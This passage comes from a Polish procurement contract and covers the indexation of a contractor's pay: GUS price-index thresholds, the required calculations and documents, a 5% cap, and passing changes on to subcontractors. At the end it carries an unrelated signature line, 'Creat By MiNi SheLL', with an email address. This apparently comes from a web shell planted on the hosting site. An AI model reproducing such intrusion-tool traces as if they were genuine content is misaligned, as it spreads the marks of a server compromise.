15%.<br/>Zmniejszenie wynagrodzenia nastąpi w przypadku gdy skumulowany spadek cen, począwszy od miesiąca w którym zawarto umowę na moment złożenia wniosku przez stronę, będzie większy niż 15%.<br/>5) Waloryzacji podlegać będzie wyłącznie wynagrodzenie należne Wykonawcy za usługi pozostałe do wykonania <br/>w okresie podlegającym waloryzacji, to jest usługi pozostałe do wykonania począwszy od dnia złożenia wniosku o waloryzację wynagrodzenia.<br/>6) Sposób określenia wpływu zmiany kosztów na koszt wykonania zamówienia: Strona występująca z wnioskiem o zmianę wynagrodzenia musi wykazać, że zmiana użytych do realizacji zamówienia kosztów względem kosztów przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie wynika ze zmiany wskaźnika GUS i miała faktyczny wpływ na koszty wykonania zamówienia. Tym samym wniosek ten musi zawierać propozycję zmiany wysokości wynagrodzenia wraz z uzasadnieniem oraz dokumenty niezbędne do oceny, w szczególności:<br/>a) szczegółową kalkulację proponowanej zmienionej wysokości wynagrodzenia Wykonawcy oraz wykazanie adekwatności propozycji do zmiany wysokości kosztów wykonania zamówienia przez Wykonawcę, wraz z określeniem kategorii (rodzaju) i wartości kosztów, przyjętych w celu ustalenia wynagrodzenia Wykonawcy zawartego w ofercie lub ustalonego w wyniku poprzedniej waloryzacji, których zmiana może uzasadniać wystąpienie z wnioskiem o zmianę wynagrodzenia oraz sposób obliczania ich zmiany i prezentacji obliczeń. Przedstawiona kalkulacja musi w sposób niebudzący wątpliwości wykazywać wpływ zmiany wskaźnika korygującego na wysokość dotychczas stosowanych cen materiałów lub kosztów w rozliczeniach Stron;<br/>b) dokumenty potwierdzające zasadność wystąpienia z wnioskiem (w szczególności, jego zgodność z zasadami zmiany wynagrodzenia określonymi w niniejszym ustępie) oraz prawidłowość obliczeń w zakresie zmiany wysokości kosztów wykonania umowy oraz wnioskowanej zmiany wysokości wynagrodzenia Wykonawcy.<br/>7) Łączna maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający wynosi 5% wynagrodzenia całkowitego brutto.<br/>8) Wykonawca, którego wynagrodzenie zostało zmienione zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, o ile przedmiotem umowy z podwykonawcą są usługi, a okres obowiązywania umowy przekracza 6 miesięcy pod rygorem kary umownej o której mowa w § 10 ust. 1 pkt 2 lit. d).

Creat By MiNi SheLL
Email: jattceo@gmail.com